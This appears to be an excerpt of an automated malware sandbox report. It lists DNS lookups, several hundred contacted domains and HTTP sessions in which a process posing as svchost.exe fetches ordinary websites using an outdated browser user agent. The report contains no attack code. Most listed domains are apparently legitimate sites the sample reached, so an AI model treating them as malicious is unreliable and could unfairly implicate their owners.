                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.454497099 CET8.8.8.8192.168.2.50x1e6aNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.466203928 CET8.8.8.8192.168.2.50x9776No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.466203928 CET8.8.8.8192.168.2.50x9776No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.473097086 CET8.8.8.8192.168.2.50xf4d8Name error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.496284962 CET8.8.8.8192.168.2.50x72bName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.497746944 CET8.8.8.8192.168.2.50x4824No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.551438093 CET8.8.8.8192.168.2.50xc90fNo error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.563997030 CET8.8.8.8192.168.2.50x4efeNo error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.564271927 CET8.8.8.8192.168.2.50x54a9No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.583985090 CET8.8.8.8192.168.2.50x8dceNo error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.619623899 CET8.8.8.8192.168.2.50x592fNo error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.631030083 CET8.8.8.8192.168.2.50x3135No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.631341934 CET8.8.8.8192.168.2.50x34d6No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.631341934 CET8.8.8.8192.168.2.50x34d6No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.631341934 CET8.8.8.8192.168.2.50x34d6No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.644330025 CET8.8.8.8192.168.2.50x3c7aNo error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.653312922 CET8.8.8.8192.168.2.50xefbbNo error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.661851883 CET8.8.8.8192.168.2.50xd522No error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:56.667208910 CET8.8.8.8192.168.2.50xf4dfNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      • diamir.de
                                                                                                                                                                                                                                                                                                      • www.muhr-soehne.de
                                                                                                                                                                                                                                                                                                      • www.diamir.de
                                                                                                                                                                                                                                                                                                      • sigtoa.com
                                                                                                                                                                                                                                                                                                      • orlyhotel.com
                                                                                                                                                                                                                                                                                                      • ldh.la.gov
                                                                                                                                                                                                                                                                                                      • hyab.se
                                                                                                                                                                                                                                                                                                      • techtrans.de
                                                                                                                                                                                                                                                                                                      • pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                                      • nts-web.net
                                                                                                                                                                                                                                                                                                      • flamingorecordings.com
                                                                                                                                                                                                                                                                                                      • clinicasanluis.com.co
                                                                                                                                                                                                                                                                                                      • hyab.com
                                                                                                                                                                                                                                                                                                      • dataform.co.uk
                                                                                                                                                                                                                                                                                                      • www.quadlock.com
                                                                                                                                                                                                                                                                                                      • www.olras.com
                                                                                                                                                                                                                                                                                                      • www.dgmna.com
                                                                                                                                                                                                                                                                                                      • www.jenco.co.uk
                                                                                                                                                                                                                                                                                                      • www.pdqhomes.com
                                                                                                                                                                                                                                                                                                      • www.mqs.com.br
                                                                                                                                                                                                                                                                                                      • www.rs-ag.com
                                                                                                                                                                                                                                                                                                      • www.item-pr.com
                                                                                                                                                                                                                                                                                                      • www.baijaku.com
                                                                                                                                                                                                                                                                                                      • www.pr-park.com
                                                                                                                                                                                                                                                                                                      • www.alteor.cl
                                                                                                                                                                                                                                                                                                      • www.valdal.com
                                                                                                                                                                                                                                                                                                      • www.depalo.com
                                                                                                                                                                                                                                                                                                      • www.elpro.si
                                                                                                                                                                                                                                                                                                      • www.credo.edu.pl
                                                                                                                                                                                                                                                                                                      • www.vazir.se
                                                                                                                                                                                                                                                                                                      • www.nunomira.com
                                                                                                                                                                                                                                                                                                      • www.nelipak.nl
                                                                                                                                                                                                                                                                                                      • www.petsfan.com
                                                                                                                                                                                                                                                                                                      • www.otena.com
                                                                                                                                                                                                                                                                                                      • www.transsib.com
                                                                                                                                                                                                                                                                                                      • www.tvtools.fi
                                                                                                                                                                                                                                                                                                      • www.evcpa.com
                                                                                                                                                                                                                                                                                                      • www.edimart.hu
                                                                                                                                                                                                                                                                                                      • www.t-tre.com
                                                                                                                                                                                                                                                                                                      • www.abart.pl
                                                                                                                                                                                                                                                                                                      • www.vexcom.com
                                                                                                                                                                                                                                                                                                      • www.xaicom.es
                                                                                                                                                                                                                                                                                                      • www.hummer.hu
                                                                                                                                                                                                                                                                                                      • www.pcgrate.com
                                                                                                                                                                                                                                                                                                      • www.abdg.com
                                                                                                                                                                                                                                                                                                      • www.naoi-a.com
                                                                                                                                                                                                                                                                                                      • www.cokocoko.com
                                                                                                                                                                                                                                                                                                      • www.waldi.pl
                                                                                                                                                                                                                                                                                                      • www.synetik.net
                                                                                                                                                                                                                                                                                                      • www.aevga.com
                                                                                                                                                                                                                                                                                                      • www.ora.ecnet.jp
                                                                                                                                                                                                                                                                                                      • www.sjbs.org
                                                                                                                                                                                                                                                                                                      • www.holleman.us
                                                                                                                                                                                                                                                                                                      • www.yocinc.org
                                                                                                                                                                                                                                                                                                      • www.stnic.co.uk
                                                                                                                                                                                                                                                                                                      • www.fink.com
                                                                                                                                                                                                                                                                                                      • www.netcr.com
                                                                                                                                                                                                                                                                                                      • www.maktraxx.com
                                                                                                                                                                                                                                                                                                      • www.speelhal.net
                                                                                                                                                                                                                                                                                                      • www.jacomfg.com
                                                                                                                                                                                                                                                                                                      • www.findbc.com
                                                                                                                                                                                                                                                                                                      • www.cel-cpa.com
                                                                                                                                                                                                                                                                                                      • www.gpthink.com
                                                                                                                                                                                                                                                                                                      • www.lrsuk.com
                                                                                                                                                                                                                                                                                                      • www.jchysk.com
                                                                                                                                                                                                                                                                                                      • www.mobilnic.net
                                                                                                                                                                                                                                                                                                      • www.nqks.com
                                                                                                                                                                                                                                                                                                      • www.c9dd.com
                                                                                                                                                                                                                                                                                                      • www.fe-bauer.de
                                                                                                                                                                                                                                                                                                      • www.domon.com
                                                                                                                                                                                                                                                                                                      • www.dayvo.com
                                                                                                                                                                                                                                                                                                      • www.myropcb.com
                                                                                                                                                                                                                                                                                                      • www.pwd.org
                                                                                                                                                                                                                                                                                                      • www.vitaindu.com
                                                                                                                                                                                                                                                                                                      • www.stajum.com
                                                                                                                                                                                                                                                                                                      • www.kernsafe.com
                                                                                                                                                                                                                                                                                                      • www.valselit.com
                                                                                                                                                                                                                                                                                                      • www.iamdirt.com
                                                                                                                                                                                                                                                                                                      • www.pupi.cz
                                                                                                                                                                                                                                                                                                      • www.yoruksut.com
                                                                                                                                                                                                                                                                                                      • www.wifi4all.nl
                                                                                                                                                                                                                                                                                                      • www.2print.com
                                                                                                                                                                                                                                                                                                      • www.fcwcvt.org
                                                                                                                                                                                                                                                                                                      • www.x0c.com
                                                                                                                                                                                                                                                                                                      • www.snugpak.com
                                                                                                                                                                                                                                                                                                      • www.photo4b.com
                                                                                                                                                                                                                                                                                                      • www.crcsi.org
                                                                                                                                                                                                                                                                                                      • www.ora-ito.com
                                                                                                                                                                                                                                                                                                      • www.medius.si
                                                                                                                                                                                                                                                                                                      • www.ka-mo-me.com
                                                                                                                                                                                                                                                                                                      • www.com-sit.com
                                                                                                                                                                                                                                                                                                      • www.railbook.net
                                                                                                                                                                                                                                                                                                      • www.tyrns.com
                                                                                                                                                                                                                                                                                                      • www.spanesi.com
                                                                                                                                                                                                                                                                                                      • www.tc17.com
                                                                                                                                                                                                                                                                                                      • www.fnsds.org
                                                                                                                                                                                                                                                                                                      • www.pohlfood.com
                                                                                                                                                                                                                                                                                                      • www.11tochi.net
                                                                                                                                                                                                                                                                                                      • www.pb-games.com
                                                                                                                                                                                                                                                                                                      • www.sclover3.com
                                                                                                                                                                                                                                                                                                      • karila.fr
                                                                                                                                                                                                                                                                                                      • themark.org
                                                                                                                                                                                                                                                                                                      • hchc.org
                                                                                                                                                                                                                                                                                                      • muhr-soehne.de
                                                                                                                                                                                                                                                                                                      • vvsteknik.dk
                                                                                                                                                                                                                                                                                                      • stopllc.com
                                                                                                                                                                                                                                                                                                      • strazynski.pl
                                                                                                                                                                                                                                                                                                      • touchfam.ca
                                                                                                                                                                                                                                                                                                      • okashimo.com
                                                                                                                                                                                                                                                                                                      • top1oil.com
                                                                                                                                                                                                                                                                                                      • cpmteam.com
                                                                                                                                                                                                                                                                                                      • sinwal.com
                                                                                                                                                                                                                                                                                                      • ifesnet.com
                                                                                                                                                                                                                                                                                                      • dhh.la.gov
                                                                                                                                                                                                                                                                                                      • bggs.com
                                                                                                                                                                                                                                                                                                      • shanks.co.uk
                                                                                                                                                                                                                                                                                                      • webavant.com
                                                                                                                                                                                                                                                                                                      • yhsll.com
                                                                                                                                                                                                                                                                                                      • kursavto.ru
                                                                                                                                                                                                                                                                                                      • eos-i.com
                                                                                                                                                                                                                                                                                                      • gcss.com
                                                                                                                                                                                                                                                                                                      • rokoron.com
                                                                                                                                                                                                                                                                                                      • k-nikko.com
                                                                                                                                                                                                                                                                                                      • insia.com
                                                                                                                                                                                                                                                                                                      • cutchie.com
                                                                                                                                                                                                                                                                                                      • hamaker.net
                                                                                                                                                                                                                                                                                                      • isom.org
                                                                                                                                                                                                                                                                                                      • tabbles.net
                                                                                                                                                                                                                                                                                                      • dspears.com
                                                                                                                                                                                                                                                                                                      • hes.pt
                                                                                                                                                                                                                                                                                                      • envogen.com
                                                                                                                                                                                                                                                                                                      • jabian.com
                                                                                                                                                                                                                                                                                                      • cbaben.com
                                                                                                                                                                                                                                                                                                      • snf.it
                                                                                                                                                                                                                                                                                                      • kayoaiba.com
                                                                                                                                                                                                                                                                                                      • absblast.com
                                                                                                                                                                                                                                                                                                      • semuk.com
                                                                                                                                                                                                                                                                                                      • onzcda.com
                                                                                                                                                                                                                                                                                                      • daytonir.com
                                                                                                                                                                                                                                                                                                      • dbnet.at
                                                                                                                                                                                                                                                                                                      • rkengg.com
                                                                                                                                                                                                                                                                                                      • apcotex.com
                                                                                                                                                                                                                                                                                                      • metaforacom.com
                                                                                                                                                                                                                                                                                                      • atbauk.org
                                                                                                                                                                                                                                                                                                      • x96.com
                                                                                                                                                                                                                                                                                                      • bossinst.com
                                                                                                                                                                                                                                                                                                      • rast.se
                                                                                                                                                                                                                                                                                                      • reproar.com
                                                                                                                                                                                                                                                                                                      • kallman.net
                                                                                                                                                                                                                                                                                                      • sidepath.com
                                                                                                                                                                                                                                                                                                      • dyag-eng.com
                                                                                                                                                                                                                                                                                                      • sgk.home.pl
                                                                                                                                                                                                                                                                                                      • mackusick.de
                                                                                                                                                                                                                                                                                                      • nlcv.bas.bg
                                                                                                                                                                                                                                                                                                      • tozzhin.com
                                                                                                                                                                                                                                                                                                      • iranytu.net
                                                                                                                                                                                                                                                                                                      • zugseil.com
                                                                                                                                                                                                                                                                                                      • adventist.ro
                                                                                                                                                                                                                                                                                                      • beafin.com
                                                                                                                                                                                                                                                                                                      • nettle.pl
                                                                                                                                                                                                                                                                                                      • mackusick.com
                                                                                                                                                                                                                                                                                                      • agulatex.com
                                                                                                                                                                                                                                                                                                      • ascc.org.au
                                                                                                                                                                                                                                                                                                      • skypearl.com
                                                                                                                                                                                                                                                                                                      • web-york.com
                                                                                                                                                                                                                                                                                                      • nekono.net
                                                                                                                                                                                                                                                                                                      • sjbmw.com
                                                                                                                                                                                                                                                                                                      • epc.com.au
                                                                                                                                                                                                                                                                                                      • nettlinx.org
                                                                                                                                                                                                                                                                                                      • likangds.com
                                                                                                                                                                                                                                                                                                      • kumaden.com
                                                                                                                                                                                                                                                                                                      • ramkome.com
                                                                                                                                                                                                                                                                                                      • impexnc.com
                                                                                                                                                                                                                                                                                                      • indonesiamedia.com
                                                                                                                                                                                                                                                                                                      • fundeo.com
                                                                                                                                                                                                                                                                                                      • dayvo.com
                                                                                                                                                                                                                                                                                                      • magicomm.co.uk
                                                                                                                                                                                                                                                                                                      • xult.org
                                                                                                                                                                                                                                                                                                      • portoccd.org
                                                                                                                                                                                                                                                                                                      • coxkitchensandbaths.com
                                                                                                                                                                                                                                                                                                      • com-edit.fr
                                                                                                                                                                                                                                                                                                      • vdoherty.com
                                                                                                                                                                                                                                                                                                      • karmy.com.pl
                                                                                                                                                                                                                                                                                                      • skgm.ru
                                                                                                                                                                                                                                                                                                      • a-domani.com
                                                                                                                                                                                                                                                                                                      • any-s.net
                                                                                                                                                                                                                                                                                                      • btsi.com.ph
                                                                                                                                                                                                                                                                                                      • scintel.com
                                                                                                                                                                                                                                                                                                      • gbmfg.com
                                                                                                                                                                                                                                                                                                      • holp-ai.com
                                                                                                                                                                                                                                                                                                      • wnit.org
                                                                                                                                                                                                                                                                                                      • acraloc.com
                                                                                                                                                                                                                                                                                                      • dog-jog.net
                                                                                                                                                                                                                                                                                                      • zupraha.cz
                                                                                                                                                                                                                                                                                                      • pers.com
                                                                                                                                                                                                                                                                                                      • oh28ya.com
                                                                                                                                                                                                                                                                                                      • ossir.org
                                                                                                                                                                                                                                                                                                      • wanoa.com
                                                                                                                                                                                                                                                                                                      • sokuwan.net
                                                                                                                                                                                                                                                                                                      • gujarat.com
                                                                                                                                                                                                                                                                                                      • peminet.net
                                                                                                                                                                                                                                                                                                      • anduran.com
                                                                                                                                                                                                                                                                                                      • vivastay.com
                                                                                                                                                                                                                                                                                                      • komie.com
                                                                                                                                                                                                                                                                                                      • kustnara.com
                                                                                                                                                                                                                                                                                                      • 4locals.net
                                                                                                                                                                                                                                                                                                      • cbras.com
                                                                                                                                                                                                                                                                                                      • geecl.com
                                                                                                                                                                                                                                                                                                      • t-trust.jp
                                                                                                                                                                                                                                                                                                      • tbvlugus.nl
                                                                                                                                                                                                                                                                                                      • aluminox.es
                                                                                                                                                                                                                                                                                                      • juso-gr.ch
                                                                                                                                                                                                                                                                                                      • ntc.edu.au
                                                                                                                                                                                                                                                                                                      • floopis.com
                                                                                                                                                                                                                                                                                                      • refintl.org
                                                                                                                                                                                                                                                                                                      • amic.at
                                                                                                                                                                                                                                                                                                      • siongann.com
                                                                                                                                                                                                                                                                                                      • aba.org.eg
                                                                                                                                                                                                                                                                                                      • vonparis.com
                                                                                                                                                                                                                                                                                                      • biurohera.pl
                                                                                                                                                                                                                                                                                                      • assideum.com
                                                                                                                                                                                                                                                                                                      • amerifor.com
                                                                                                                                                                                                                                                                                                      • unicus.jp
                                                                                                                                                                                                                                                                                                      • fortknox.bm
                                                                                                                                                                                                                                                                                                      • shiner.com
                                                                                                                                                                                                                                                                                                      • vfcindia.com
                                                                                                                                                                                                                                                                                                      • pellys.co.uk
                                                                                                                                                                                                                                                                                                      • keio-web.com
                                                                                                                                                                                                                                                                                                      • cubodown.com
                                                                                                                                                                                                                                                                                                      • simetar.com
                                                                                                                                                                                                                                                                                                      • ludomemo.com
                                                                                                                                                                                                                                                                                                      • kavram.com
                                                                                                                                                                                                                                                                                                      • jnf.at
                                                                                                                                                                                                                                                                                                      • nrsi.com
                                                                                                                                                                                                                                                                                                      • noblesse.be
                                                                                                                                                                                                                                                                                                      • redgiga.com
                                                                                                                                                                                                                                                                                                      • banvari.com
                                                                                                                                                                                                                                                                                                      • pccj.net
                                                                                                                                                                                                                                                                                                      • tcpoa.com
                                                                                                                                                                                                                                                                                                      • riwn.org
                                                                                                                                                                                                                                                                                                      • fogra.com.pl
                                                                                                                                                                                                                                                                                                      • atb-lit.com
                                                                                                                                                                                                                                                                                                      • aoinko.net
                                                                                                                                                                                                                                                                                                      • kewlmail.com
                                                                                                                                                                                                                                                                                                      • sledsport.ru
                                                                                                                                                                                                                                                                                                      • jsaps.com
                                                                                                                                                                                                                                                                                                      • angework.com
                                                                                                                                                                                                                                                                                                      • duiops.net
                                                                                                                                                                                                                                                                                                      • s5w.com
                                                                                                                                                                                                                                                                                                      • ccssinc.com
                                                                                                                                                                                                                                                                                                      • univi.it
                                                                                                                                                                                                                                                                                                      • arowines.com
                                                                                                                                                                                                                                                                                                      • infotech.pl
                                                                                                                                                                                                                                                                                                      • orbitgas.com
                                                                                                                                                                                                                                                                                                      • smitko.net
                                                                                                                                                                                                                                                                                                      • wantapc.net
                                                                                                                                                                                                                                                                                                      • alexpope.biz
                                                                                                                                                                                                                                                                                                      • mikihan.com
                                                                                                                                                                                                                                                                                                      • roewer.de
                                                                                                                                                                                                                                                                                                      • oozkranj.com
                                                                                                                                                                                                                                                                                                      • workplus.hu
                                                                                                                                                                                                                                                                                                      • bidroll.com
                                                                                                                                                                                                                                                                                                      • e-kami.net
                                                                                                                                                                                                                                                                                                      • zemarmot.net
                                                                                                                                                                                                                                                                                                      • mcseurope.nl
                                                                                                                                                                                                                                                                                                      • pcoyuncu.com
                                                                                                                                                                                                                                                                                                      • paraski.org
                                                                                                                                                                                                                                                                                                      • invictus.pl
                                                                                                                                                                                                                                                                                                      • bd-style.com
                                                                                                                                                                                                                                                                                                      • hazmatt.com
                                                                                                                                                                                                                                                                                                      • forbin.net
                                                                                                                                                                                                                                                                                                      • missnue.com
                                                                                                                                                                                                                                                                                                      • wvs-net.de
                                                                                                                                                                                                                                                                                                      • icd-host.com
                                                                                                                                                                                                                                                                                                      • shteeble.com
                                                                                                                                                                                                                                                                                                      • umcor.am
                                                                                                                                                                                                                                                                                                      • pertex.com
                                                                                                                                                                                                                                                                                                      • adeesa.net
                                                                                                                                                                                                                                                                                                      • johnlyon.org
                                                                                                                                                                                                                                                                                                      • araax.com
                                                                                                                                                                                                                                                                                                      • bount.com.tw
                                                                                                                                                                                                                                                                                                      • sanfotek.net
                                                                                                                                                                                                                                                                                                      • popbook.com
                                                                                                                                                                                                                                                                                                      • valselit.com
                                                                                                                                                                                                                                                                                                      • ncn.de
                                                                                                                                                                                                                                                                                                      • cjcagent.com
                                                                                                                                                                                                                                                                                                      • shesfit.com
                                                                                                                                                                                                                                                                                                      • revoldia.net
                                                                                                                                                                                                                                                                                                      • lyto.net
                                                                                                                                                                                                                                                                                                      • aiolos-sa.gr
                                                                                                                                                                                                                                                                                                      • webways.com
                                                                                                                                                                                                                                                                                                      • cjborden.com
                                                                                                                                                                                                                                                                                                      • cyclad.pl
                                                                                                                                                                                                                                                                                                      • akdeniz.nl
                                                                                                                                                                                                                                                                                                      • htsmx.net
                                                                                                                                                                                                                                                                                                      • captlfix.com
                                                                                                                                                                                                                                                                                                      • softizer.com
                                                                                                                                                                                                                                                                                                      • bible.org
                                                                                                                                                                                                                                                                                                      • shenhgts.net
                                                                                                                                                                                                                                                                                                      • kairel.com
                                                                                                                                                                                                                                                                                                      • hubbikes.com
                                                                                                                                                                                                                                                                                                      • canasil.com
                                                                                                                                                                                                                                                                                                      • shittas.com
                                                                                                                                                                                                                                                                                                      • ftmobile.com
                                                                                                                                                                                                                                                                                                      • mijash3.com
                                                                                                                                                                                                                                                                                                      • midap.com
                                                                                                                                                                                                                                                                                                      • gydrozo.ru
                                                                                                                                                                                                                                                                                                      • msl-lock.com
                                                                                                                                                                                                                                                                                                      • mondopp.net
                                                                                                                                                                                                                                                                                                      • avse.hu
                                                                                                                                                                                                                                                                                                      • yoruksut.com
                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      0192.168.2.550143138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:25 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:26 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:25 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 162
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:26 UTC0INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      1192.168.2.5501535.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:25 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:26 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:25 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                                                      Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      Content-Length: 51841
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:26 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:26 UTC17INData Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65
                                                                                                                                                                                                                                                                                                      Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:26 UTC33INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
